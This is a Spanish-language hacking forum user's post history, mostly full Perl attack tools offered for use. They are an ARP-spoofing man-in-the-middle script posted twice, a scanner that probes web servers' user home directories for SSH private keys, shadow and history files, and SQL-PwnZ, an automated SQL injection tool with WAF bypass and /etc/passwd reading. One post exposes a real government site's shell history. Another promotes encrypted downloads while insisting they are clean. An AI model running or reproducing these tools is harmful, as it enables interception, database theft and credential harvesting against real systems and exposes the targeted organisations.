Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Login-Root

#1
Hacking / Re: Perl ARP-Spoofer v0.2
4 Febrero 2011, 23:17 PM
Gracias a las ideas de averno saco la v0.2  ;D

v0.2:

  • IPTables forwarding añadido (gracias averno)
  • Restauración de mac's originales y forwarding
  • Mas info en ejecucion



    Screenshot:




    Wireshark dump:




    Code:

    #!/usr/bin/perl

    # Perl ARP-Spoofer By Login-Root
    # Long life Camacho Tequila
    # 2011 shit
    # Run it as root

    # Net::ARP & Net::Ping requerido
    use Net::ARP;
    use Net::Ping;

    if ($< != 0)
    {
    print "\n[!] Run it as root\n\n";
    exit(0);
    }

    if(!$ARGV[2])
    {
    print "\n###########################################";
    print "\n# Perl ARP-Spoofer v0.2 | Login-Root Pwnz #";
              print "\n###########################################";
    print "\n\nUse: perl $0 [INTERFACE] [HOST 1 (Router)] [HOST 2 (Victim)]\n\n";
              exit(0);
    }

    sub finaliza
    {
    print "\n\n[!] Restaurando cache ARP de host's remotos\n";

    print "\n[+] $host1 is-at $mac1 (to $host2)";
    Net::ARP::send_packet($dev, $host1, $host2, $mac1, $mac2, 'reply');
    print "\n[+] $host2 is-at $mac2 (to $host1)";
    Net::ARP::send_packet($dev, $host2, $host1, $mac2, $mac1, 'reply');

    print "\n\n[!] Deshabilitando forwarding...";

    open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
    print FORWD "0";
    close(FORWD);

    system("iptables -P FORWARD DROP");

    print "\n[!] Saliendo...\n\n";
    exit(0);
    }

    ($dev, $host1, $host2) = @ARGV;

    print "\n[+] Perl ARP-Spoofer v0.2 starting | Login-Root [+]\n";

    $lmac = Net::ARP::get_mac($dev);

    print "\n[!] MAC Local : $lmac";

    my $ping = Net::Ping->new('icmp');
       $ping->ping($host1, 2);
       $ping->ping($host2, 2);

    $mac1 = Net::ARP::arp_lookup($dev,$host1);
    $mac2 = Net::ARP::arp_lookup($dev,$host2);

    print "\n[!] MAC Host 1: $mac1";
    print "\n[!] MAC Host 2: $mac2";

    print "\n\n[!] Habilitando forwarding...";

    open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
    print FORWD "1";
    close(FORWD);

    # (thnx averno)
    system("iptables -P FORWARD ACCEPT");

    print "\n\n[!] Comenzando ARP-Spoofing entre $host1 & $host2, Ctrl-C para finalizar...\n";

    while(1)
    {
            $SIG{INT} = \&finaliza;
    sleep(1);
    print "\n[+] $host1 is-at $lmac (to $host2)";
    Net::ARP::send_packet($dev, $host1, $host2, $lmac, $mac2, 'reply');
    print "\n[+] $host2 is-at $lmac (to $host1)";
    Net::ARP::send_packet($dev, $host2, $host1, $lmac, $mac1, 'reply');

    }

    __END__
#2
Hacking / Re: Perl ARP-Spoofer v0.1
4 Febrero 2011, 17:27 PM
Mi idea es hacer una simple demostración de arp spoofing en perl, no reinventar la rueda rehaciendo la suite dsniff ;-)

Saludos
#3
Hacking / Perl ARP-Spoofer v0.2
3 Febrero 2011, 08:48 AM
Simple ARP-Spoofer escrito en Perl, recien salido del horno, espero que les guste / sirva :P

v0.2:

  • IPTables forwarding añadido (gracias averno)
  • Restauración de mac's originales y forwarding
  • Mas info en ejecucion


    Screenshot:




    Wireshark dump:




    Code:

    #!/usr/bin/perl

    # Perl ARP-Spoofer By Login-Root
    # Long life Camacho Tequila
    # 2011 shit
    # Run it as root

    # Net::ARP & Net::Ping requerido
    use Net::ARP;
    use Net::Ping;

    if ($< != 0)
    {
    print "\n[!] Run it as root\n\n";
    exit(0);
    }

    if(!$ARGV[2])
    {
    print "\n###########################################";
    print "\n# Perl ARP-Spoofer v0.2 | Login-Root Pwnz #";
              print "\n###########################################";
    print "\n\nUse: perl $0 [INTERFACE] [HOST 1 (Router)] [HOST 2 (Victim)]\n\n";
              exit(0);
    }

    sub finaliza
    {
    print "\n\n[!] Restaurando cache ARP de host's remotos\n";

    print "\n[+] $host1 is-at $mac1 (to $host2)";
    Net::ARP::send_packet($dev, $host1, $host2, $mac1, $mac2, 'reply');
    print "\n[+] $host2 is-at $mac2 (to $host1)";
    Net::ARP::send_packet($dev, $host2, $host1, $mac2, $mac1, 'reply');

    print "\n\n[!] Deshabilitando forwarding...";

    open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
    print FORWD "0";
    close(FORWD);

    system("iptables -P FORWARD DROP");

    print "\n[!] Saliendo...\n\n";
    exit(0);
    }

    ($dev, $host1, $host2) = @ARGV;

    print "\n[+] Perl ARP-Spoofer v0.2 starting | Login-Root [+]\n";

    $lmac = Net::ARP::get_mac($dev);

    print "\n[!] MAC Local : $lmac";

    my $ping = Net::Ping->new('icmp');
       $ping->ping($host1, 2);
       $ping->ping($host2, 2);

    $mac1 = Net::ARP::arp_lookup($dev,$host1);
    $mac2 = Net::ARP::arp_lookup($dev,$host2);

    print "\n[!] MAC Host 1: $mac1";
    print "\n[!] MAC Host 2: $mac2";

    print "\n\n[!] Habilitando forwarding...";

    open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
    print FORWD "1";
    close(FORWD);

    # (thnx averno)
    system("iptables -P FORWARD ACCEPT");

    print "\n\n[!] Comenzando ARP-Spoofing entre $host1 & $host2, Ctrl-C para finalizar...\n";

    while(1)
    {
            $SIG{INT} = \&finaliza;
    sleep(1);
    print "\n[+] $host1 is-at $lmac (to $host2)";
    Net::ARP::send_packet($dev, $host1, $host2, $lmac, $mac2, 'reply');
    print "\n[+] $host2 is-at $lmac (to $host1)";
    Net::ARP::send_packet($dev, $host2, $host1, $lmac, $mac1, 'reply');

    }

    __END__
#4
Hacking / Re: [!] Apache Files Finder
11 Octubre 2010, 18:26 PM
Dependiendo de la configuración del Apache, acceden al public_html o no. Y creeme que he encontrado archivos interesantes de esta forma, hay muchos usuarios que montan webs vulnerables o depositan archivos importantes en su public_html, creyendo que nadie se los puede leer, y bueno despues son vulnerados.

Te dejo un ejemplo ;) (que hace .bash_history ahi si es el public_html ¿¿??):

http://sitl.diputados.gob.mx/.bash_history



Contenido:

pwd
ls -la
pwd
ls
cd recepcion_diputados
ls
cd cuestionario
exit
df -k
top
id
su
id
su
id
ls
clear
df -k
ls
cd /
ls
cd var/
ls
cd local/
ls
ls
find / -name htdocs
su
clear
ls
su
printenv
NLS_LANG=AMERICAN_AMERICA.WE8ISO8859P1
export NLS_LANG
printenv
su
exit
su
su
su
exit
date
date
su root
exit
pwd
cls
pwd
pass


(Lindo disclosure de comandos y directorios, genial para obtener información adicional)

;)
#5
Hacking / [!] Apache Files Finder
11 Octubre 2010, 01:58 AM
Este script básicamente lo que realiza es buscar archivos/carpetas interesantes en las home`s de algun servidor que corra Apache (Y tenga la opción de acceso con ~, es decir, se permita acceder a http://www.website.com/~nombreusuario/). Para ello se necesitan de dos archivos de texto, el primero, con la lista de usuarios a probar (que podremos haber sacado por brute-force, mediante LFI, LOAD_FILE, etc.), y segundo, la lista con directorios a probar en cada uno de los home`s de cada usuario.

Ejemplos:


users.txt

root
ftp
mysql
bin
daemon
ibsoc
ifsca
aminen
dpisf
idsum
ieduc
ivivi
itcp
sergio
juan
backup
imosp
publish
gbrusa
igobi
iforo
ispyc
amoran
mysqldump
mesaadm
sinrespuesta
amgarcia
mcabrera
boletinoficial
dsum
improd
patricia
mauro
agostina
lucila
hyperic
nagios
clamav



dirs.txt

index.htm
index.html
index.php
.bash_history
.bashrc
.ftpquota
.gbent
.grc
.gui
.host
.hosts
.jpilot
.master
.members
.mysql_history
.net
.nsconfig
.pass
.passes
.pwd
.ssh/
.ssh/know_hosts
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/id_rsa.priv
.ssh/id_rsa.key
host
hosts
passwd
shadow



Funcionamiento:




Salida (results.html):



Code:

#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;

if(!$ARGV[3])
    {
        print "\n\n#####################################";
        print "\n# Apache Files Finder By Login-Root #";
        print "\n#####################################";
        print "\n\nUso: perl $0 [WEBSITE] [USERS LIST] [DIRECTORY LIST] [PATH TO SAVE (HTML)]";
        print "\nEx : perl $0 http://www.website.com users.txt dirs.txt results.html\n\n";
        exit(0);
    }

$ua = LWP::UserAgent->new;
$ua->agent("Google Bot");

($web, $users, $dirs, $save) = @ARGV;

if ( $web   !~   /^http:/ )
  {
      $web = "http://" . $web;
  }

open USERS, $users;
open SAVE, ">>$save";

print "\n[!] Scanning $web for files in users, saving in $save\n\n";

foreach $lista(<USERS>)
{
    chomp($lista);
    open DIRS, $dirs;
    foreach $dir(<DIRS>)
    {
        chomp($dir);
        $host = $web.`/~`.$lista.`/`.$dir;
        $req = HTTP::Request->new(GET => "$host");
        $res = $ua->request($req);
        $result = $res->code;
        if ($result != 404 and $result != 403)
        {
            print "\n".$res->status_line.": $host";
            print SAVE $res->status_line.` : <a href="`.$host.`" TARGET="_new">`.$host.`</a><br>`;
        }
    }
    close(DIRS);
}

print "\n";
close(USERS,SAVE);

__END__
#6
Gracias por ser el unico en comentar aqui, prometo agregarlo en futuras versiones :)

Saludos.
#7
Nuevo:

  • Agregado mod_security Bypass.
  • Agregado Illegal Mix Of Collations Bypass.
  • Agregadas más tablas para bruteforce.
  • Agregadas más columnas para bruteforce.
  • Código interno mejorado.
  • Bugs Fixeados.


    Sitio con mod_security activado:




    SQL-PwnZ: Bypasseando





    Salida:






    Sitio con Illegal Mix Of Collations:




    SQL-PwnZ: Bypasseando




    Salida:






    Código:


    #!/usr/bin/perl

    ##################################################################################################################
    #                                  -[+]- SQL-PwnZ v1.5 | By Login-Root -[+]-                                   ###
    ##################################################################################################################

    ##################################################################################################################
    # [+] inf0:                                                                                                    ###
    ##################################################################################################################
    # Busca:                                                                                                       ###
    # ======                                                                                                       ###
    #  - Nº de columnas                                                                                            ###
    #  - Information_Schema && MySQL.User                                                                          ###
    #  - LOAD_FILE                                                                                                 ###
    #  - Tablas                                                                                                    ###
    #  - Columnas                                                                                                  ###
    #  - Illegal Mix Of Collations Bypass && mod_security Bypass                                                   ###
    #                                                                                                              ###
    #  ...y guarda todo en un archivo de texto.                                                                    ###
    #                                                                                                              ###
    ##################################################################################################################

    ##################################################################################################################
    # [+] Use:                                                                                                     ###
    ##################################################################################################################
    # perl sqlpwnz.pl [WEBSITE] [COLUMNAS] [ARCHIVO] [COMENTARIO] [-TB] [-CL] [-NOCHECK] [-MOD_FUCK] [-MIX_BYPASS] ###
    #   [WEBSITE]: http://www.web.com/index.php?id=12 [INGRESAR UN ID VALIDO]                                      ###
    #   [COLUMNAS]: Limite de columnas                                                                             ###
    #   [ARCHIVO]: Archivo donde guardar web vulnerable                                                            ###
    #   [COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)                                                    ###
    #   [-TB]: Intentar brutear tablas (Opcional)                                                                  ###
    #   [-CL]: Intentar brutear columnas (Opcional)                                                                ###
    #   [-NOCHECK]: No hacer el chequeo inicial (Opcional)                                                         ###
    #   [-MOD_FUCK]: Activar mod_security Bypass (Opcional)                                                        ###
    #   [-MIX_BYPASS]: Activar Illegal Mix Of Collations Bypass (Opcional)                                         ###
    ##################################################################################################################

    ##################################################################################################################
    # [+] c0ntact:                                                                                                 ###
    ##################################################################################################################
    # MSN:    no.more@passport.com                                                                                 ###
    # E-Mail: login_root@yahoo.com.ar                                                                              ###
    ##################################################################################################################

    ##################################################################################################################
    # [+] sh0utz:                                                                                                  ###
    ##################################################################################################################
    # Greetz: KiKo ; VanHan ; [Dead] Knet ; Ricota ; InyeXion ; OxOnO ; Matt ; r0dr1 ; oceanik6 ; OzX ; yoyahack   ###
    # VISIT: WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                                                         ###
    ##################################################################################################################

    use HTTP::Request;
    use LWP::UserAgent;

    if(!$ARGV[2])
    {
    print "\n\n-[+]- SQL-PwnZ v1.5 | By Login-Root -[+]-\n=========================================";
    print "\n\nUso: perl $0 [WEBSITE] [COLUMNAS] [ARCHIVO] [COMENTARIO] [-TB] [-CL] [-NOCHECK] [-MOD_FUCK] [-MIX_BYPASS]\n";
    print "\n[WEBSITE]: http://www.web.com/index.php?id=12 [INGRESAR UN ID VALIDO]\n[COLUMNAS]: Limite de columnas\n[ARCHIVO]: Archivo donde guardar web vulnerable\n[COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)\n[-TB]: Intentar brutear tablas (Opcional)\n[-CL]: Intentar brutear columnas (Opcional)\n[-NOCHECK]: No hacer el chequeo inicial (Opcional)\n[-MOD_FUCK]: Activar mod_security Bypass (Opcional)\n[-MIX_BYPASS]: Activar Illegal Mix Of Collations Bypass (Opcional)\n\n";
    exit (0);
    }

    @nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users',
      'name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios',
      'miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores',
      'administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user',
      'user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name',
      'member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre',
      'user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth',
      'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio',
      'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head',
      'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users',
      'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente',
      'sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes',
      'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos',
          'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','web_users','curso',
          'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead',
          'associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users',
          'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users','tb_usuarios',
          'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','tb_usuario',
      'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

    @nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha',
              'username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente',
              'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario',
              'login_id','usr','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username',
              'sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave',
      'membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password',
              'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
              'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

    ($host, $columnas, $savelist) = @ARGV;

    $agent = LWP::UserAgent->new;
    $agent->agent("Google Bot");

    if ( $host   !~   /^http:/ )
      {
          $host = "http://" . $host;
      }

    for ($numarg = 0 ;  $numarg <= $#ARGV ; $numarg++)
    {
    $argumentos.= $ARGV[$numarg];
    }

    if ($argumentos =~ /-MIX_BYPASS/i)
    {
    print "\n[+] MIX_BYPASS ACTIVADO";
    $hexin = "unhex(hex(";
    $hexend = "))";
    }
    if ($argumentos !~ /-MOD_FUCK/i)
    {
    if ($argumentos =~ /--/)
    {
    $cmn= "+";
    $cfin="--";
    print "\n[+] Comentarios a utilizar: '--' & '+'";
    }
    else
    {
    $cmn= "/**/";
    $cfin= "/*";
    print "\n[+] Comentarios a utilizar: '/*' & '/**/'";
    }
    }
    else
    {
    print "\n[+] MOD_FUCK ACTIVADO, se ignoran comentarios. Utilizando: '+'. Bypass: '/*!' & '*/'";
    $bypass = "+/*!";
    $cmn= "+";
    $cfin= "*/";
    }

    open(WEB,">>".$savelist) || die "\n\n[-] Imposible crear el archivo de texto\n";
    if ($argumentos =~ /-NOCHECK/i)
      {
          print "\n[!] Se omite el chequeo inicial...\n";
          print WEB "[WEBSITE]:\n\n$host\n";
      }
    else
      {
          print "\n[!] Chequeando si la web es vulnerable...\n";
          $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cfin));
          $response = $sql->content();
          if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /error de sintaxis al final de la entrada/ || $response =~ /Unknown column/)
            {
                print "[+] Web vulnerable, continua el script...\n";
                print WEB "[WEBSITE]:\n\n$host\n";
            }
            else
              {
                print "[-] Website aparentemente no vulnerable a SQL Inyection, intentar con otro comentario o con -NOCHECK activado\n\n";
        close(WEB);
                exit(0);
              }
      }
    print "\n[!] Buscando columnas...\n";
    for ($column = 1 ; $column <= $columnas ; $column ++)
    {
    $UNION.=','.$column;
    $inyection.=','."0x6c6f67696e70776e7a";
        if ($column == 1)
          {
              print WEB "\n[COLUMNAS]:\n\n";
              $inyection = '';
              $UNION = '';
          }
        $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin));
        $response = $sql->content();
        if($response =~ /loginpwnz/)
          {
             print "[+] La web posee $column columnas\n\n";
             $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cfin;
             print "$sql\n";
             print WEB "$sql\n";
             print "\n[!] Chequeando si existe Information_Schema...";
             $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn."information_schema.tables".$cfin));
             $response = $sql->content();
             if($response =~ /loginpwnz/)
              {
              print "\n[+] Information_Schema disponible...guardando en $savelist";
                $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn."information_schema.tables".$cfin;
                print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
               
              }
             else
              {
                print "\n[-] Information_Schema no disponible";
              }
             print "\n[!] Chequeando si existe MySQL.User...";
             $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn."mysql.user".$cfin));
             $response = $sql->content();
             if($response =~ /loginpwnz/)
              {
              print "\n[+] MySQL.User disponible...guardando en $savelist";
              $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn."mysql.user".$cfin;
                print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
               
              }
             else
              {
                print "\n[-] MySQL.User no disponible";
              }
    while ($loadcont < $column-1)
       {
    $loadfile.=','.$hexin.'LOAD_FILE(0x2f6574632f706173737764)'.$hexend;
    $loadcont++;
       }
    print "\n[!] Chequeando si es posible inyectar LOAD_FILE...";
    $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn.$hexin."LOAD_FILE(0x2f6574632f706173737764)".$hexend.$loadfile.$cfin));
        $response = $sql->content();
        if($response =~ /root:x:/)
              {
              print "\n[+] LOAD_FILE disponible...guardando en $savelist";
              print WEB "\n\n[LOAD_FILE]:\n\n$hexinLOAD_FILE(0x2f6574632f706173737764)$hexend => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
              }
             else
              {
                print "\n[-] LOAD_FILE no disponible";
              }
    if ($argumentos =~ /-TB/i)
              {
                  print "\n\n[!] Bruteando tablas...";
                  print WEB "\n\n[TABLAS]:\n\n";
                  foreach $tabla(@nombretabla)
                    {
                      chomp($tabla);
                      $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn.$tabla.$cfin));
                      $response = $sql->content();
                      if($response =~ /loginpwnz/)
                        {
                            print "\n[+] La tabla $tabla esta disponible...guardando en $savelist";
                            $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn.$tabla.$cfin;
                            print WEB "$sql\n";
                        }
                    }
                }
            if ($argumentos =~ /-CL/i)
              {
              print "\n\n[!] Tabla a la cual brutear columnas: ";
                $tabla=<STDIN>;
                chomp($tabla);
                print WEB "\n\n[COLUMNAS EN $tabla]:\n\n";
                foreach $columna(@nombrecolumna)
                {
                 chomp($columna);
                 $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn.$hexin."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$hexend.$inyection.$cmn."FROM".$cmn.$tabla.$cfin));
                 $response = $sql->content();
                 if ($response =~ /loginpwnz/)
                      {
                          print "\n[+] La columna $columna esta disponible...guardando en $savelist";
                          print WEB "$hexin$columna$hexend\n";
                      }
                }
            }
            print WEB "\n\n\n[*EOF*]";
            print "\n\n[+] Todo salvado correctamente en $savelist\n\n";
            print "## c0ded by Login-Root | 2010 ##\n\n";
    close(WEB);
            exit (0);
          }
    }
    print "[-] Imposible encontrar numero de columnas, intentar con mas columnas\n\n";
    print "## c0ded by Login-Root | 2010 ##\n\n";
    close(WEB);
    exit (0);



    Sitio:

    http://sourceforge.net/projects/sqlpwnz/
#8
Hacking / Re: Shell-Run | IPFilter - By VanHan
12 Febrero 2010, 02:41 AM
Para que no lo desamblen y vean el source ;)
#9
Hacking / Shell-Run | IPFilter - By VanHan
11 Febrero 2010, 03:14 AM
Aca les dejo dos programitas que hizo un amigo mio, VanHan, cuando fui a la casa y le pedi que me los programara (si, soy un vago terrible :P)

Shell-Run:

Un simple launcher, lo uso para cuando estoy en Windows y quiero ejecutar codes (python, perl, etc), rapidamente. Ponen el comando (python, perl, el que quieran), el lugar del archivo, abajo los argumentos y listo.






Si quieren lo pueden minimizar a la tray y dejarlo corriendo en segundo plano:




Download (Multiple mirrors):

http://massmirror.com/16b7214f1832d3682193b0b86d3a45db.html


:-------------------------------------------------------------:

IPFilter:

Este es mas completito, sirve para filtrar los numeros, fechas, puntos, etc de los siguientes servidores de Reverse IP:



Vamos por ejemplo, a usar la primera, http://www.ip-adress.com/reverse_ip

Ponemos la IP o el dominio y damos a Enter. Copiamos todos los dominios de esa respectiva IP.



Los pegamos en el programa (Fijense que este bien seleccionado www.ip-adress.com) y le damos a filtrar.



Listo! Filtrados. :D



Dando click a Guardar guarda el texto filtrado en el archivo "Ips.txt".

Download (Multiple mirrors):

http://massmirror.com/675283888b9ba458430631f4564a5fe3.html

Ah, me olvidaba...antes que me digan: LOGIN-ROOT ESTO ESTA TROYANIZADO !, les digo que NO, solo estan cifrados, por eso les salta el AV. Ejecutenlo en una PC Virtual, sniffen las conexiones con Wireshark, hagan lo que quieran. Los codes estan 100% limpios.


Saludos.
#10
Busca acerca de Blind MySQL Inyection  ;D


Saludos.